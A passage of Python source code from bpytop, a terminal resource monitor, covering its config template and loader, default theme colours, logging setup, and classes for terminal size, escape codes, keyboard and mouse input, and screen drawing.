("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Sets if 24-bit truecolor should be used, will convert 24-bit colors to 256 color (6x6x6 color cube) if false.
truecolor=$truecolor
#* Manually set which boxes to show. Available values are "cpu mem net proc", separate values with whitespace.
shown_boxes="$shown_boxes"
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes update multiplier, sets how often the process list is updated as a multiplier of "update_ms".
#* Set to 2 or higher to greatly decrease bpytop cpu usage. (Only integers)
proc_update_mult=$proc_update_mult
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Sets the CPU stat shown in upper half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_upper="$cpu_graph_upper"
#* Sets the CPU stat shown in lower half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_lower="$cpu_graph_lower"
#* Toggles if the lower CPU graph should be inverted.
cpu_invert_lower=$cpu_invert_lower
#* Set to True to completely disable the lower CPU graph.
cpu_single_graph=$cpu_single_graph
#* Shows the system uptime in the CPU box.
show_uptime=$show_uptime
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors have been found
show_coretemp=$show_coretemp
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to False if the menus are flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",".
#* Begin line with "exclude=" to change to exclude filter, otherwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Filter out non physical disks. Set this to False to include network disks, RAM disks and similar.
only_physical=$only_physical
#* Read disks list from /etc/fstab. This also disables only_physical.
use_fstab=$use_fstab
#* Toggles if io stats should be shown in regular disk usage view
show_io_stat=$show_io_stat
#* Toggles io mode for disks, showing only big graphs for disk read/write speeds.
io_mode=$io_mode
#* Set to True to show combined read/write io graphs in io mode.
io_graph_combined=$io_graph_combined
#* Set the top speed for the io graphs in MiB/s (10 by default), use format "device:speed", separate disks with a comma ",".
#* Example: "/dev/sda:100, /dev/sdb:20"
io_graph_speeds="$io_graph_speeds"
#* Set fixed values for network graphs, default "10M" = 10 Mebibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, e.g. "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwidth usage or auto scale, bandwidth usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Starts with the Network Interface specified here.
net_iface="$net_iface"
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetic
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "#00",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
SUBSCRIPT: Tuple[str, ...] = ("₀", "₁", "₂", "₃", "₄", "₅", "₆", "₇", "₈", "₉")
SUPERSCRIPT: Tuple[str, ...] = ("⁰", "¹", "²", "³", "⁴", "⁵", "⁶", "⁷", "⁸", "⁹")
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
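#* Usage (illustrative): decorate a function with @timeit_decorator to log its runtime to errlog at DEBUG level.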
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "use_fstab", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "theme_background",
"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp", "proc_update_mult", "shown_boxes", "net_iface", "only_physical",
"truecolor", "io_mode", "io_graph_combined", "io_graph_speeds", "show_io_stat", "cpu_graph_upper", "cpu_graph_lower", "cpu_invert_lower",
"cpu_single_graph", "show_uptime"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
truecolor: bool = True
shown_boxes: str = "cpu mem net proc"
update_ms: int = 2000
proc_update_mult: int = 2
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
cpu_graph_upper: str = "total"
cpu_graph_lower: str = "total"
cpu_invert_lower: bool = True
cpu_single_graph: bool = False
show_uptime: bool = True
check_temp: bool = True
cpu_sensor: str = "Auto"
show_coretemp: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
only_physical: bool = True
use_fstab: bool = False
show_io_stat: bool = True
io_mode: bool = False
io_graph_combined: bool = False
io_graph_speeds: str = ""
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
net_iface: str = ""
show_battery: bool = True
show_init: bool = True
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
cpu_percent_fields: List = ["total"]
cpu_percent_fields.extend(getattr(psutil.cpu_times_percent(), "_fields", []))
cpu_sensors: List[str] = [ "Auto" ]
if hasattr(psutil, "sensors_temperatures"):
try:
_temps = psutil.sensors_temperatures()
if _temps:
for _name, _entries in _temps.items():
for _num, _entry in enumerate(_entries, 1):
if hasattr(_entry, "current"):
cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
except:
pass
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformed or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version mismatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
continue
if not '=' in line:
continue
key, line = line.split('=', maxsplit=1)
if not key in self.keys:
continue
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorting" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "update_ms" in new_config and int(new_config["update_ms"]) < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
new_config["cpu_sensor"] = "_error_"
self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
if "shown_boxes" in new_config and not new_config["shown_boxes"] == "":
for box in new_config["shown_boxes"].split(): #type: ignore
if not box in ["cpu", "mem", "net", "proc"]:
new_config["shown_boxes"] = "_error_"
self.warnings.append(f'Config key "shown_boxes" contains invalid box names!')
break
for cpu_graph in ["cpu_graph_upper", "cpu_graph_lower"]:
if cpu_graph in new_config and not new_config[cpu_graph] in self.cpu_percent_fields:
new_config[cpu_graph] = "_error_"
self.warnings.append(f'Config key "{cpu_graph}" does not contain an available cpu stat attribute!')
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
DEBUG = CONFIG.log_level == "DEBUG"
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if ARG_BOXES:
_new_boxes: List = []
for _box in ARG_BOXES.split():
if _box in ["cpu", "mem", "net", "proc"]:
_new_boxes.append(_box)
CONFIG.shown_boxes = " ".join(_new_boxes)
del _box, _new_boxes
if SYSTEM == "Linux" and not os.path.isdir("/sys/class/power_supply"):
CONFIG.show_battery = False
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
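#* Event used to pace the resize wait loops below; set by refresh() when it is called while a resize is already in progress.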
old_boxes: List = []
min_width: int = 0
min_height: int = 0
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if Init.running: cls.resized = False; return
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and cls.old_boxes == Box.boxes and not force: return
if force: Collector.collect_interrupt = True
if cls.old_boxes != Box.boxes:
w_p = h_p = 0
cls.min_width = cls.min_height = 0
cls.old_boxes = Box.boxes.copy()
for box_class in Box.__subclasses__():
for box_name in Box.boxes:
if box_name in str(box_class).capitalize():
if not (box_name == "cpu" and "proc" in Box.boxes) and not (box_name == "net" and "mem" in Box.boxes) and w_p + box_class.width_p <= 100:
w_p += box_class.width_p
cls.min_width += getattr(box_class, "min_w", 0)
if not (box_name in ["mem", "net"] and "proc" in Box.boxes) and h_p + box_class.height_p <= 100:
h_p += box_class.height_p
cls.min_height += getattr(box_class, "min_h", 0)
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < cls.min_width or cls._h < cls.min_height):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < cls.min_width or cls._h < cls.min_height:
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, box_width, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < cls.min_width else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < cls.min_height else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.d(1)}{Mv.l(25)}{Colors.default}{Colors.black_bg}Current config needs: {cls.min_width} x {cls.min_height}{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
Collector.proc_counter = 1
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
if out and text: out += " "
if text: out += f'{text}'
return f'\033]0;{out}\a'
class Fx:
"""Text effects
* trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace.
* uncolor(string: str) : Removes all 24-bit color and returns the string."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor position
t = to
r = right
l = left
u = up
d = down
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
return bool(cls.list)
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If the first character is an escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting an IO block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go through dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
* .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
* .last_screen() : Prints all saved buffers
'''
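#* Example (illustrative): Draw.buffer("+clock!", "12:00") appends "12:00" to the "clock" buffer and prints that buffer immediately.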
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
